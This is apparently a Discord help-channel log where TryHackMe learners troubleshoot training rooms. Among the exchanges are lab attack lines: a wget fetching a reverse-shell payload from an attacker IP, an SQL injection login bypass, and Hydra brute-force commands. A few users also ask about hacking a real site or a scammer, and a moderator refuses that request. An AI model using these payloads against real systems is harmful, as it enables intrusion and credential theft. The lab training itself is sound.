#room-help

@brave cypress Please slow down. Further spam will result in a short timeout.

how to solve them?

hi there can you please help me find some vulnerabilities in this web site https://www.opins.ai

You need to click this pencil button, assign yourself to the alerts and change their status accordingly

No

I feel a little bit bad, also asking for help with the same room, but I am trying to triage alerts in the SOC L1 Alert Triage room. I got the first one, but I have tried all of the other options on the multiple choice, and tried refreshing it a couple of times, and I still am having issues triaging the second one.

nvm, I was able to figure it out.

Hey guys a unkown number is calling can i find whos is it behind this number?

Are you on android? There's a new app called truecaller that helps me. Not sure if it will help you but you can give it a go

I am on ios

Ah don't know about that sorry

Its okey i have an androit too but i dont use it that much i will give it a try thank you btw

What about Discord Tocken?

Hi everyone, im currently in "Incident handling with splunk" and the room make me very confusing. At task 4, reconnaissance phase, instruction said "validate ip scanning" but the matter of fact here is in the splunk lab it only show a huge http request to 1 url only which i think a little bit conflict with "scanning" definition (multi request to multi url/port). I think this should be a brute force attempt or ddos, what do you think ?

you get this resolved (pun intended)? Remember, it's always dns. You likely need to edit your /etc/resolv.conf - tested and working as expected from my own kali over openvpn

boop

I am taking some Burpsuite Labs and the target machine is not available. Has anyone else ran into this issue?

room link? - i have not encountered this

hi guys , anyone can help me with BreachingAd room , im running through an issue try to do Pass-back attack for ldap , im trying to post a photo but it wont let me , so i will explain it here in wrting , when im visiting http://printer.za.tryhackme.com/settings to test me nc listiner on 389 , anyway i put my ip and i press test settings button i always get "LDAP Connection failed: The LDAP server is unavailable." tried many times same error , made sure im connected on the same network

heres room link :https://tryhackme.com/room/breachingad

a screenshot : https://ibb.co/1YJXfNKn

ok nevermind its sorted with good gemini 😄 lol , thanks everyone

For your THM account?

bonjour j'arrive pas a écrire sécurité défensive

This server is English only

what's the difference if i did resolv.conf vs resolv-dns-masq?

its look likes it work. but i don't know why it didn't work the first time

🇬🇧 English:
Hello everyone,
My name is [mehdi], I’m 17 years old from Morocco. I’m a complete beginner in ethical hacking and cybersecurity, and I’m really motivated to learn and improve myself step by step.

Right now, I only use my phone, but I’m trying to make the best out of what I have while learning the basics. I’m looking for guidance, resources, and people who can help me grow in this field and become a skilled and responsible ethical hacker.

I believe in learning legally and using knowledge to protect systems, not harm them. If anyone has advice, learning paths, or is willing to mentor or guide me, I would really appreciate it.

Thank you for your time 🙏

🇲🇦 العربية:
السلام عليكم،
أنا اسمي [اسمك]، عمري 17 سنة من المغرب. أنا مبتدئ تماماً في مجال الهكر الأخلاقي والأمن السيبراني، وعندي رغبة كبيرة باش نتعلم ونتطور خطوة بخطوة.

حالياً كنستعمل غير الهاتف ديالي، ولكن كنحاول نستغل الإمكانيات اللي عندي باش نبدا بالأساسيات. كنقلب على ناس يعاونوني بالنصائح، مصادر التعلم، أو التوجيه باش نقدر نطور راسي ونولي هاكر أخلاقي قوي ومسؤول.

أنا كنآمن بالتعلم القانوني واستعمال المهارات لحماية الأنظمة، ماشي للإضرار بها. أي نصيحة أو مساعدة غادي تكون محل تقدير كبير.

شكراً بزاف 🙏

Good to have you!

Thanks

Gave +1 Rep to @little jetty (current: #1266 - 5)

kali uses resolv.conf by default and the thm lab machine uses dnsmasq - 2 diff ways to config dns.

thank you for the info and help

Gave +1 Rep to @slim bison (current: #271 - 40)

Hi

Hi everyone! I'm stuck on a "Topic Transition Recap" task in the Windows and Active Directory room.

Task question: "What PowerShell command would reset the password for user 'alice' in Active Directory and prompt for the new password securely?"

I've tried:

Set-ADAccountPassword -Identity alice -Reset -NewPassword (Read-Host -AsSecureString -Prompt "New password")

But I keep getting: Set-ADAccountPassword: invalid arguments

I've checked for typos, kept it on one line, and included -Reset. Nothing works. Could someone please point out what I'm missing? Thank you!

Yes 🫡

i have done that but still flags are not showing

What did you change exactly

room link? best guess Set-ADAccountPassword -Identity alice -Reset -NewPassword (Read-Host "New password" -AsSecureString)

if u copied the command from browser, retype the hyphens and quotes manually. A sneaky Unicode dash before AsSecureString, NewPassword, or Reset can cause ugly “invalid arguments” style errors.

let me show you

Change status

i did that too, changed it to closed but still nothing showed

Thanks

Gave +1 Rep to @slim bison (current: #267 - 41)

@slim bison thanks

There's one thing wrong here

what?

Did you see what other info is provided for you in this alert?

means?

Why this alert got triggered in the first place?

no, i couldnt see any reason there or info related to the same

Click the little arrow icon next to that pencil icon

You triage alerts based on the context and not just because it's marked as critical or high

Yup, exactly that

okay, so now what is the next step?

Read the provided info and reassess whether your judgment was correct

like whether it is true positive or false positive?

Yup

https://tryhackme.com/room/burpsuitebasicsold

let me check

its true positive, i was right

Why would you think so?

The rule triggered on 5.8 GB sent in a single day to *.zoom.us, which exceeds the threshold for potential exfiltration.

but i am not sure now as i went deeper into it, and i find it False Positive (benign high-volume Zoom traffic)

So, what would your final verdict be?

false positive

Congrats - you're right

It's a correct Zoom domain, so it will definitely send out voice and maybe video - those are pretty big when it comes to size
When you look at the network name (UK04/MEETINGROOM) it gets a bit clearer. There must've been a bit of meetings in that room today and for sure not everyone was there in person, so they used zoom to connect and probably used a camera

So we get back to the beginning. Voice and Video are pretty big.

When we connect alert + context you get an actually true view and result

okay, thanks. so now the status will be closed and the verdict will be false positive rignt?

Gave +1 Rep to @ashen crane (current: #44 - 268)

yup

got the flag for it bro, thank you for your help and time.

sure

you are in the old room. try this: https://tryhackme.com/room/burpsuitebasics

Good day everyone. Emeka here, from Nigeria. recently picked interest in cybersecurity and i guess curiosity led me here. hope to learn a considerable lot from all of you here. Gracias.

help me with this now, not getting the flag

You need to do the same thing as before pretty much

Read the provided info and decide whether it's true or false positive by looking at the context

is it true positive?

What do you think

not sure, thats why i asked you

All right, I'll ask a different question - how did you come up with the idea that this could be a true positive

look at the chain of commands and their order in Invoked Commands - does this look like usual activity for a normal user on the network or an attacker?

I marked it as a likely true positive mainly because it looks similar to known attack behavior, but I’m not 100% certain without more context. The IIS process spawning a reverse shell and then running AD discovery commands is something we often see after a compromise, especially on a DMZ Exchange server under SYSTEM. That said, I still feel it should be validated against any approved admin scripts or monitoring tools before making a final call.

Your assesment is correct

I don't think there's a need to validate it against admin scripts, since we clearly see in Parent Process that this command was executed by revshell.exe stored in C:\Users\Public, so place where everyone can write something

So, weird path + what you've said = true positive

exactly, but even after marking it as true positive its not approvinga and i am not getting the flag. also, previously, they said that i just have to write the comment here nothing else, and i have done it in my previous task and i got the flag. but this time i am not receiving it

Did you change all the fields? Like assign it to yourself and mark it as closed?

yes i did it

Is it still the same room?

It worked! Configured "Last 5 years", should work. Tnx!

what i need to put here? im a little confuse i know what it is but.. they need the "exacly" right answer

hi everyone what did you gus write for this question {What category of ARP Packet asks a device whether or not it has a specific IP address?}

were you able to get it?

Doing room Subdomain Enumeration... im supposed to go to crt.sh but it's giving me 502

yeah I wonder if crt.sh is just down or something at the moment I just tried too

Hi guys I need help on windows powershell room, whenever I try to connect the attackbox using remmina there is an error "could not start SSH session"

Room link? Odd that an rdp service would throw an ssh error- two diff protos

I followed the steps provided on how to connect to the lab including the target IP

https://tryhackme.com/room/windowspowershell

yesterday it was working, today it won't connect on the remmina

Def sounds like a room bug since it was working yesterday. I'll sanity check it but best to #1333993673381253162 it.

working from the thm attackbox (us-east-1)- which region are you? might wanna spin up another AB

I'm from Asia so I use the AP region mumbai

the platform was down briefly today but now fixed, not sure if related, sometimes you get a broken AB

Already tried terminating and opening atk box twice still the same issue

Ohh I see thanks, I'll try and test it again

u could also spin up in another region, if you have your own machine

hi, is there any problem with mumbai server? i cant start machine in room, have been waiting for 1 hour with "no available machine right now"

Hi, i am in subdomain enumeration but can not access https://crt.sh its say 502 Bad Gateway

Its been down for a while

https://crt.sh try this

does it still say down? @wise dune

it is work! thank you @orchid rover

Gave +1 Rep to @orchid rover (current: #996 - 7)

I am in the room https://tryhackme.com/room/aimodelsdata
and at the challenge section i got an issue on the Files tab i can't select the enterprise-classifier-v2.pkl text, it is not clickable i found all the other words on the model card tab.
What I am doing wrong?

Hi,
I'm having technical difficulties in the room ExploitingAD. I'm stuck before it gets interesting. I followed all instructions and I ssh za.tryhackme.loc\louis.thornton@thmwrk1.za.tryhackme.loc is still getting stuck. BTW I'm running the original AttackBox (AttackBox Beta was worse over the last days, so I came back to the original one) Any ideas what might be the problem?

no its the SOC L1 alert reporting room and still i did not received any flag for these 2 ques. For the first ques they said i need to fill the flag from my previous task alert triage and i did the same but it is not accepting that flag

Did you change anything else in there?

i did nothing, i tried everything. With or without change, in both the cases i did not received any flag

Did you read the task?

which one?

The one you're trying to solve

there are 2 and i am trying to solve both, so which one you are asking about?

Let's take the first one first

yes

So read it and check whether you've actually did what the task asks you for

this was the last task and i edited the alert and immediately received the flag. so, this time i just need to edit the same alert again and after saving it i was supposed to receive the flag but i didn't?

this was the description of the alert

What did you edit?

everything (comment, verdict, status, assignee) and one time i had just put the comment and saved it but then also no flag

Who did you assign it to?

i assigned it to the L2 people, and when that didnt worked out i assigned it to myself

tinker with the status, it should help

what?

Play around with the status of this

like try every status then save?

For example

like first keep it to new, then in progress and then closed

Yeah and saving it between those steps as well

while editing the alert i just keep the status to new and wrote the comment and saved it then received the flag but when entering the flag this is what i received

You've recieved the previous flag

means?

This is the flag you're trying to input rn

the flag is same but its not accepting, this is the previous flag

Because it's not correct

working as expected from my instance

HEY

thanks for trying out, i went back and it works as in your screenshoot, strange I was sure i hovered over each field so far.

Gave +1 Rep to @slim bison (current: #263 - 42)

you get this sorted? Did you rememember to restart dnsmasq services after editing the conf file?

Hello, I am working in SQL Injection Lab.
For task4 I succed to authenticate, but I dont see the flag.

Do I need to authenticate as an particular user?

refresh the page, and yeah u received the flag but might edited or simple mis html source for Message section.

then, what to do next? can you help me with it?

I refresh the page and nothing

view the source luke

yeah, see the source code, that kalimaxx said.

really weird

I dont understand why is not working

Status -> in progres
And assign it to L2

try this on login form: user for username and for password: 'or 1=1-- -

that works

make me confuse more that teach me that challenge

good- now the homework for you is to look at how the form is parsing it versus your non working payload to see why it worked and yours didnt - you can see it in view-source or burp

still not correct

Did you copy and paste this in or type it? Sometimes typing it in works

copy pasted it, i tried writing it too but still it doesnt worked out

Hmm so maybe the answer is still wrong

type manully instead. or just type 00000000000 and send it to see underscores and your flag pattern whether its correct or something else.

Its gotta be a different phrase

You get the same flag still

I am a fullstack engineer who has almost 6 years.
But I really wanna cyber security engineering from now.
Plz help me.

Where can I get answers to the Alert Prioritisation

I am stuck

thanks for the reply – it restarted it yesterday – it didn't work. Today however, it worked. Weird.

Gave +1 Rep to @slim bison (current: #258 - 43)

i tried, and the underscores and the flag pattern is different

yes, i dont understand what is the root cause? Stucked on this task for more than a day now😭

see writeups for that room, or give me the url of that room and task.

I’m doing the Hoppers Origins, and the VPN access has stopped working. Is anyone else having the same issue? It seems like the lab is stuck.

its working well for me/

HII

I am having trouble with a question from Task 6 of the Splunkk 2 room. here is the particular question I am having an issue with :

"What unusual file (for an American company) does winsys32.dll cause to be downloaded into the Frothly environment?"

https://tryhackme.com/room/splunk2gcd5

Not letting me copy the text in the submmission box of the tryhackme room

Thiis is the answer, but something is wrong with the submission to this particular question.

tried translating it into english and see if it works

Hello

I'm writing PT1 exam, flag is not showing. But it is the valid one

Hello

sure but there is no URL i am seeing for the room but you can search SOC L1 Alert Reporting room, and its task 5 is Escalation guide where i am stuck

Its "I_Love_David.hwp" but it will not allow me to type that out

you can't type, "i_love_david.hwp" ?

it doesnt work for me. everytime i type an 'underscore' it skips to anpther one

help me cli command saying no directory found

tried no underscore?

tried without the -name

yep

you didn't input it correctly

it should looks like this "I love David.hwp"

filename can have space

i did that and it wouldnt accept my answer
. did it accept yours

i don't know what course it is. haha

and i can't seem to find it as well

its the splunk 2 room

but it did find the directory - look again, it's in the output. link to room?

sorry i can't help you any further. since i have not gotten to that point.

ok

that answer is incorrect. hint: the filename is in Korean

i tried submitting the korean solution ...and it would not allow me

show me what u tried

I would not overthink this one. The string is Unicode-escaped Hangul Jamo. Decode it with CyberChef using “From Unicode Escape.” On my host machine, Chrome preserves the original characters.

The technically correct decoded filename is:
나는_데이비드를_사랑한다.hwp

나는_데이비드를_사랑한다.hwp <--- even Discord corrupts the data upon display

If the grader rejects it, try the same answers without .hwp. Some graders want only the filename stem.

If it accepts something that looks truncated or oddly split, that is probably a Unicode normalization/display issue with the grader rather than your decoding being wrong.

Hello , i m doing Nmap Advanced Port Scans and i was wondering why i can t use my kali linux with vpn doing these rooms only able to reach the target machine with nmap on the attackbox , did someone encounter this as well ?

i completed the lab from my machine without issues (us-east-1) region - which region are you using? you may need to switch if it's a connection isssue

eu central -1

but i m using kali linux on wsl

can you at least ping the lab from your kali? i would try switching regions

i can ping it

└─$ ping 10.112.158.59
PING 10.112.158.59 (10.112.158.59) 56(84) bytes of data.
64 bytes from 10.112.158.59: icmp_seq=1 ttl=62 time=27.2 ms
64 bytes from 10.112.158.59: icmp_seq=2 ttl=62 time=30.1 ms
64 bytes from 10.112.158.59: icmp_seq=3 ttl=62 time=27.5 ms
64 bytes from 10.112.158.59: icmp_seq=5 ttl=62 time=27.5 ms
64 bytes from 10.112.158.59: icmp_seq=6 ttl=62 time=27.1 ms
^C
--- 10.112.158.59 ping statistics ---
6 packets transmitted, 5 received, 16.6667% packet loss, time 5024ms
rtt min/avg/max/mdev = 27.082/27.878/30.092/1.120 ms

┌──(szabi㉿Szabi-PC)-[/mnt/c/Users/szabi]
└─$ nmap -sn 10.112.158.59
Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-09 18:59 +0300
Nmap scan report for 10.112.158.59
Host is up (0.028s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

but nmap is giving no result while on attackbox
┌──(root㉿kali)-[~]
└─# nmap -sF 10.112.158.59
Starting Nmap 7.93 ( https://nmap.org ) at 2026-05-09 15:51 UTC
Nmap scan report for ip-10-112-158-59.eu-central-1.compute.internal (10.112.158.59)
Host is up (0.0023s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
53/tcp open|filtered domain
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
993/tcp open|filtered imaps
995/tcp open|filtered pop3s

Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds

┌──(root㉿kali)-[~]
└─# nmap -sN 10.112.158.59
Starting Nmap 7.93 ( https://nmap.org ) at 2026-05-09 15:52 UTC
Nmap scan report for ip-10-112-158-59.eu-central-1.compute.internal (10.112.158.59)
Host is up (0.0044s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
53/tcp open|filtered domain
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
993/tcp open|filtered imaps
995/tcp open|filtered pop3s

Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds

┌──(root㉿kali)-[~]

for my secure my acount

FYI i was able to reach it and you need to run the vpn trough kali linux

oh my - we all did that at least once in the beginning;) but i bet not next time;) You are learning to troubleshoot - mission accomplished - happy hacking;)

fyi, python REPL also works

hello in burp suite I cannot see the advisory tab anymore. Can anyone help me where this is located?

i believe the advisory tab is for pro. I completed like week ago. i didnt see it

Woah I see thanks dude the room only said that Issue Activity was the only burp suit exclusive feature

Gave +1 Rep to @slate gull (current: #997 - 7)

no problem.... that section is pretty easy to comprehend.

you shouldn't take too long to do it.

good luck

alright man thanks!!!

im with this flag THM{NmNlZTliNGE1MWU1ZTQzMzgzNmFiNWVk} but i already decode in base64 and dont get the right answer.. i have try with NT or md5 but nothing.. anyone could give me a hint

just paste the flag as you found it into the answer field

hello anyone know a list of ctf rooms after finishing the 101 cybersecurity ?

You can follow the resources in this blog post!

https://tryhackme.com/resources/blog/free_path

Hey guys, how are you? I hope you're doing well. This is my first time here on Discord with this community, and I'm still learning the ropes. I have a question—is there a channel where I can ask for help?

Welcome! Begin here #start-here to get up to speed fast. This channel is for specific room help. When asking, it's best to provide room link, Task and Question #, screenshots, syntax and issue so volunteers can better understand your issue and get you moving forward again

Hi, I have a question. What is the best way to learn binary exploitation. Recently I got a lil bit comfortable with reverse engineering and solving some easy crackmes here and there. I've been trying to find a room in THM or any other resources to learn some binary exploitation and exploit development but I kinda feel paralysed by soo many resources available. What should I do? Which resource should I focus on ?

Hey, this is an English only server. Thanks!

Gave +1 Rep to @fleet flint (current: #3761 - 1)

Thanks as well

Gave +1 Rep to @vagrant fern (current: #11 - 946)

Hi everyone,
Can some one help me with the screenshot please?
I’ve tried a few combinations then asked the bot,
The bot’s telling me it can be a format issue but I copy paste what he sent me, any ideas?

Well it looks like I can’t send a screenshot 😅

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account~

Thanks

Gave +1 Rep to @slim bison (current: #254 - 44)

room link? rule#1- never trust a bot;)

Tryhackme.com/room/socmetricsobjectives

It was 51 🤦

I was sure it was a format issue because of the bot

Thanks for your time though 🙏

Gave +1 Rep to @slim bison (current: #249 - 45)

Hey can someone help me? I need help unblurring these images or image cus it's the same image but the username is blurred in it and idk how to unblur it

where it is?

I'm having trouble with question 4 in the room Splunk 2 Series 400. I found the answer, but it's not being accepted. I checked on Google first, and the answer I found is correct.

if that's the korean file name question, the room hint mentions the solution, also the python REPL works too #room-hints message

Thanks, but it still doesn't work. I followed the instructions, but the field won't accept the answer.

Gave +1 Rep to @slim bison (current: #247 - 46)

show me what you are submitting? too bad i can't show u (and rule out any recent bugs) - worked for me when i did the lab a few years ago - too lazy to reset all 30 questions or create a new account. try it with and without a file xsion

I would have liked to send a screenshot, but I don't think I have the option to do so

verify your account

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account~

copy-paste within backticks works as well#room-help message

that looks correct- have you tried without the file xsion?

this is what the grader shows accepted for me, although the grader sometimes alters the final result

I see. I followed the steps using CyberChef and got the same result as you. It's not working for me, and I'm using Chrome, of course.

several others have recently had the same issue, i'd report it here #1333993673381253162 and move on, you got what you needed from the lesson

thank you for your help

Here you go sorry I just woke up

Oh wait I can't send any pictures here I'ma add you and do it that way

u can verify your THM account on discord, then u will be allowed to send files. type /verify

Oh I thought I did tho

this will really fry your noodle: https://youtu.be/WcAt_Ni_R3c?si=d3SJBcyW6tpnkeJ5&t=2411

that doesn't make sense

Hi everyone, I have a general question based on a curiosity. How did we know that the packet with attachment "attachement.scr" is malicious? (Phishing prevention room, task 7, question 4)

Found a solution. Room is bugged 7 ways from Sunday on this one, but where there's a will... basically the browser was the problem so I went direct with curl.

Why copy-paste fails:

The question answer contains a Korean filename. The grader stores it in Unicode NFD (Normalization Form Decomposed - raw
Hangul Jamo consonants and vowels). The browser UI normalizes all user input to NFC (Normalization Form Composed - precomposed
syllable blocks) before sending it to the api. NFC and NFD are semantically identical but have different byte representations,
causing the grader to always reject the correct answer when submitted through the browser.

I cannot get past the DAST room Task 3. Every time I press start scan to launch the AJAX Spider, it says Firefox is not supported.

is this your own machine or using the thm provided attackbox- do you have both as an option?

I'm using the AttackBox. I don't have my own machine to run at the moment.

unfortunate - Zap likely not updated or configured properly - only choice is to troubleshoot it or keep resetting hoping for a better instance

# Install OWASP ZAP with Snap
snap install zaproxy --classic

# Launch ZAP once
zaproxy

# ZAP may download the latest Linux tarball here:
# /root/.ZAP/plugin/ZAP_2.17.0_Linux.tar.gz

# Create install directory
mkdir -p /opt/zap-2.17.0

# Extract latest ZAP into /opt
tar -xzf /root/.ZAP/plugin/ZAP_2.17.0_Linux.tar.gz -C /opt/zap-2.17.0 --strip-components=1

# Install Java 17 JRE
apt update
apt install -y openjdk-17-jre

# Launch latest ZAP
cd /opt/zap-2.17.0
./zap.sh
``` @reef plaza this is one way to move forward

Hi guys, I am currently doing the https://tryhackme.com/room/windowseventlogs room and I am stuck on task 2 on the question "Filter on Event ID 4104. What was the 2nd command executed in the PowerShell session?". On the right pane, I used the action: "Filter Current Log..." and filtered for the event id 4104 and then I sorted the results by "Date and Time" descending but the 2nd (see the image) isn't the right answer.

And also when I am trying to answer the "Analyze the Windows PowerShell log. What is the Task Category for Event ID 800?" question, so I filter for the event id 800 but no results. Why?

Anyone a idea? For me it looks like the room isn't matching the the questions & answers.

Next thing, on task 3 the answer to the question "How many log names are in the machine?" isn't correct. In ran the following command: wevtutil.exe el | Measure-Object the output of the command is:

PS C:\Users\Administrator> wevtutil.exe el | Measure-Object


Count    : 1072
Average  :
Sum      :
Maximum  :
Minimum  :
Property :

But the right answer is 1071. Wtf?!

Thank you for the explanations and the help you've given me

Gave +1 Rep to @slim bison (current: #239 - 48)

The file inclusion the last question. Why does mine only have the following string without the previous name?

i need help with the metasploite exploitation room? specifically task #6. I created the .elf payload, then started the server with python3 -m http.server 9000 then in another shell I ran wget http://attacking_machine_ip:9000/shell.elf and i get this : wget http://10.67.78.234:9000/rev_shell.elf
--2026-05-11 14:13:17-- http://10.67.78.234:9000/rev_shell.elf
Connecting to 10.67.78.234:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: \u2018rev_shell.elf.1\u2019

rev_shell.elf.1 100%[===================>] 207 --.-KB/s in 0s

2026-05-11 14:13:17 (19.4 MB/s) - \u2018rev_shell.elf.1\u2019 saved [207/207]

where is open ticket button?

thank you ❤️

so the link you sent was a scammer trying to connect me to a Defi wallet LOL

need help please :/ Metasploite exploitation task #6. I am unable to set up the handler

https://tryhackme.com/room/metasploitexploitation

Hey guys I’m in network core protocols trying to make ssh connection but it’s not working, I tried the target IP address and tryhackme password but access denied , what should I do?

and how do you send a picture like this of a problem?

Where can we get help on a room? I’m stuck and the AI bot is never working. The instructions are ambiguous :/

you just have to write your problem here @lyric forge im trying to get help too

just verify your account: https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account~

room link? if it's this one, there is no ssh for this lab https://tryhackme.com/room/networkingcoreprotocols

so we just write commands directly on the root directory? cause i was trying the WHOIS task to find the CTF on the qn there and i got stuck

thank you by the way

Gave +1 Rep to @slim bison (current: #235 - 49)

@slim bison help please

yes that's it- you can start with whois x.com|grep -i creat

Got a helping hand?

Skipping some rooms in learning path will get certificate
I mean in every learning path showing some rooms pay premium and some rooms are free how will I get certificate ?

https://tryhackme.com/room/dailybugle
help with this room please. Stuck on "What is the user flag?" question. I uploaded a reverse shell, but it's not executing it once i try to access it as a .phar file.

Thank you!

Gave +1 Rep to @deft carbon (current: #3763 - 1)

Not yet thank you 🙏🏻 I am stuck in the metasploite exploitation room. Task #6 doesn’t really explain how and where to set up the handler. I create the .elf payload in one console and then start the http.server 9000 in the same console. Then in a different console I connect the target machine to the server with wget… after this I’m unsure where to start the handler? I tried in a third console but I get an LHOST error. I had set the LHOST to the attacking machine’s IP and the port the same as I set in the payload. The instructions didn’t really clarify how to set up the handler and then how to use it to capture the hash to answer the questions below this, so I’m a little lost. Thank you for your time!!

Gave +1 Rep to @fathom rover (current: #3763 - 1)

DM I'll walk you through it

Hello

Where do we start with all of this fun stuff? I did a few thingies on the website but how do I personally upgrade my skill as an absolute beginner in this place and cyber security as well?

Start on the presecurity path and then work from there

Hello, in Task 7 IDOR, the virtual machine won't open even though the IP address is there , and I don't see the tab to open the “attackbox” virtual machine. If anyone can help me, I'd really appreciate it!

just checked, working as expected 🤷‍♂️

I don't understand—the virtual machine won't open on my computer

this room is all browser based, no need for attackbox, all work done in tabs and dev tools

omg my bad ty!!

Gave +1 Rep to @slim bison (current: #222 - 50)

Hello I'm new , I would like to ask so guidance what's cooking currently inthis place.

hi

Hello i am trying to login to an remote desktop for a assignment in Active Directory Basics room but it is not letting me this screen pops up and says enter password but i want it to open the actual remote desktop and enter the password there, does anyone has a solution for that, Thanks.

hello

can anyone complete the hydra room?

i have tried everything

including copying working solutions

room link, Task and Question#, please? What specifically are you trying to complete???

https://tryhackme.com/room/hydra

task 2

question 1

got it- what is the issue you are facing- let's see your command syntax- what output you getting?

the output is that it keeps running and passes 32 attemps

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.140.141.208 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect"

and

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.140.141.208 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

and

use backticks for syntax for readability like this hydra

alright

it looks like it was a bug

i restarted the server and the old command worked

sorry for wasting your time

fyi, most of these labs that teach syntax provide examples that are slightly "off" from what is actually needed to solve by design - the author wants the learner to take the lesson and then extrapolate for a new case to prove you know the tool

ah that makes sense, all the brute-forcing likely "tipped over" the target, so restart was a good move - and yes since incorrect is part of the Response message, it will match on failed logins;)

Anyone Help Please

In April 2026 Windows security updates has this new feature that aims to prevent phishing attacks that abuse RDP files to steal credentials or access local files. So, you should forget the old credential window from RDC

ok, Thanks

Gave +1 Rep to @umbral glen (current: #1845 - 3)

Good day good people how does one get VM running without paying the full $90 I'm new and still learning.

You do not need to pay $90 just to start learning on TryHackMe.

A free THM account gives you access to many free rooms, and the AttackBox is available on the free plan, but it is time-limited to about 1 hour per day.

If you want more lab time without paying for unlimited AttackBox, the normal free option is to run your own Kali VM locally with VirtualBox or VMware, then connect to TryHackMe using your OpenVPN config from the THM Access page.

So the question is: are you asking about the TryHackMe AttackBox limit, or how to set up your own Kali VM?

helloo

need help in the basic malware re room. First, there has to be a better way to download the task files. I opened the attackbox and went to the browser to do it and downloaded the file. BUT it always messes up my screen when I do it that way. Anyhow, I got it downloaded but now it doesn't unzip. I have tried the unzip method and it says it's an archived file and I need a password. So I need some help please.

Here's what it gives me when I try to download them

So if need password and u dont have it, try use zip2john

parameters its like
Zip2john [zip file] output.txt

I am not sure if I am supposed to need a password. All the links I looked up on youtube they had already had it downloaded but I can try that

Could u share the room?

basdi malware re

basic malware re

this is what one writemeup in youtube has

the hint

I took that to a crack the hash, (the green stuff I had) but still didn't get an answer

let me try again with just the numbers

I didn't get an md5 hash

im trying too

The hint doesn't show up for me

Hi im doing the Kenobi Room and it seems I am getting wildly different results than whay the room is expecting. 8 open ports when there are supposed to be 7, only 1 smb share when there are supposed to be 3..... not sure what im doing wrong

ahh the question say the password is MalwareTech

Did you find that in the blog?

Nevermind, lol. I see where the password is.

hehe

so after u use the strings command to check the .exe

Lol, ya, I saw it after I read the WHOLE page

it helps if I read the entire page

how would I do it command line

for strings?

this is all new to me, lol

I looked at all the files and couldn't find a hash

most of them are empty. I know we have to unzip the file in order to read it

u use
strings file.exe

and them u can take a look

its a lot of flags and u can try filter

strings file.exe | grep flag
etc...

I don't have the executable file showing yet on command line

so the file is strings1.exe_

to read this.. u use the STRINGS command

or u can put all the content in a txt like strings strings1.exe > strings1.txt

I don't see the executable anywhere

I have the zip files and when I used the password, this is what showed up

when i click on the zip file on the right, the left window is what showed up (strings1.exe)

when I clicked on that and put in teh password, this is what came up

but I can't seem to get it on command line

try click buttom and extract on GUI mode..

for u dont wast time with this

it did it there

I clicked on it and it goes back to this

now I see it on cli

yah.. this is not a easy room.. good luck ^^

hi, currently going through the windows fundamentals 1 room https://tryhackme.com/room/windowsfundamentals1xbx and the tasks seem to be a bit out of order, i think task 3 is meant to be task 1. not a critical mistake or anything but a bit confusing nonetheless

lets go

Keep it up!

I can't complete it yet... I lack a lot of knowledge about radare2 and only know the basics.

Lol, I've never even heard of radare2!

Something new to look up🤣 🤣 🤣

hi guys, at Windows Event Logs room, Microsoft > Windows > PowerShell > Operational , i can not find ID 800. Lowest ID is 4100

i use Remina on attackbox

Hi, having trouble with the first question in task 6 of the Pyramid of Pain module. Any help would be appreciated. https://tryhackme.com/room/pyramidofpainax

@gentle phoenix try this youtube vid "The Pyramid of Pain Explained"; all answers are there

https://www.youtube.com/watch?v=y8TIKIWv2ws&t=936s

No Event were found!

Just a quick question, in the Moniker Link (CVE-2024-21413) room.
How much trouble, will i get in for cracking the netNTLMv2 hash for the funnies?

Im aware this is entirely outside of the scope of the room, which's why im asking

Hey, need help the the room owasp top 10 2025 : insecure data handling in task 3
A05:injection

hey everyone, quick (probably stupid) question. I'm still a beginner, exploring. I have a MacBook. I know how to type the ~ (tilde) in other applications, but in the VM (Linux) in the exercises, the terminal won't let me type it? I'm currently in Linux CLI Basics (pre-sec path).

thank you

Gave +1 Rep to @slim bison (current: #217 - 51)

do you have the same kayboard layout in the VM as on your physical machine?

It is much easier to help you if you describe the issue before expecting help. 🙂

thank you

Gave +1 Rep to @slim bison (current: #211 - 52)

im stuck on this qn; what login and password should i use to authenticate user in this IMAP,

IMAP commands need a tag before the command name. The tag can be almost anything, like A, B, C, or A001 - that's what the error message is hinting at
for this task(8), login is not required (answer in the context)

plaintext authentication is disabled - however, you can login using linda's creds over openssl - password is case-sensitive and must be in quotes

unable to reproduce from my mac🤷‍♂️ sounds like a keyboard-layout mismatch between your Mac/browser and the Linux VM. in the linux vm, try setxkbmap -query. it should output layout: us if not, set it with setxkbmap us then see if tilde is working

Hello,

Does anybody knows how to hack?

I need to catch a scammer who is trying to scam me

I am new to cybersecurity

We will not help with the following but not limited to:

• Account hacks/penetration testing
• Blackmailing
• Asking about account restoration
• Game hacks or cheats
• Revenge hacking
• Cyberstalking
• Take down services aka d/ddos attacks
• Etc

We will not risk our own lives to help a stranger get their accounts back or perform tests by using illegal or unethical means. If support or someone is asking you to do this. Please refer them to the rules of this server and or the proper support pages for better help.

Sure

Thank you

idk where to start

#start-here

I am stuck on Task 9 of https://tryhackme.com/room/linprivesc . I tried creating a reverse shell from /home/karen/backup.sh and that did not result in anything. I think there might be an unresolved bug affecting this task (https://discord.com/channels/521382216299839518/1471378838041788537).

I also tried creating a reverse shell from /tmp/test.py, but that script never seemed to execute either.

found a solution - this one you def had to think outside the box. granted you can't follow the lab's syntax verbatim and maybe that's the lesson - to extrapolate on the provided example.

